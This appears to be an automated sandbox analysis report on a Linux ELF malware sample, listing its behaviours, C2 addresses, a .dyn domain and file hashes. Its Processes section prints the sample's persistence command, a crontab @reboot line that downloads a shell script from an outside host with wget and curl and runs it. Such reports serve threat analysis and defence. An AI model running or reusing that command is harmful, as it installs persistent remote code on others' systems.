Analysis Overview
SHA256
bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
Threat Level: Shows suspicious behavior
The file bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:50
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:50
Reported
2024-10-27 02:53
Platform
debian9-armhf-20240611-en
Max time kernel
144s
Max time network
136s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 81.169.136.222 | N/A | N/A |
| Destination IP | 178.254.22.166 | N/A | N/A |
| Destination IP | 51.158.108.203 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.ObcLt0 | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/mounts | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A |
Processes
/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
[/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| DE | 81.169.136.222:53 | kingstonwikkerink.dyn | udp |
| BG | 31.13.248.89:14965 | kingstonwikkerink.dyn | tcp |
| DE | 178.254.22.166:53 | kingstonwikkerink.dyn | udp |
| FR | 51.158.108.203:53 | kingstonwikkerink.dyn | udp |
| UA | 88.151.195.22:6847 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.ObcLt0
| MD5 | 156ee72da2df4c852058bb0a4d6a1c57 |
| SHA1 | ddcde4860a652c8988f3cf45cb742ae199a5c4fa |
| SHA256 | 22d5d14166a842a855fecf8daa2962429aac0da074dff2c5fd31a157d2e3e3f6 |
| SHA512 | 94c14c17c65e0a2c0f1c6cbe79d480ed336c6f79ac4562ba166da7ebf765f8703502bdc8372d5079d818035efe1d7f18c16b0ab94b6e6b155dd9fd77cce78d64 |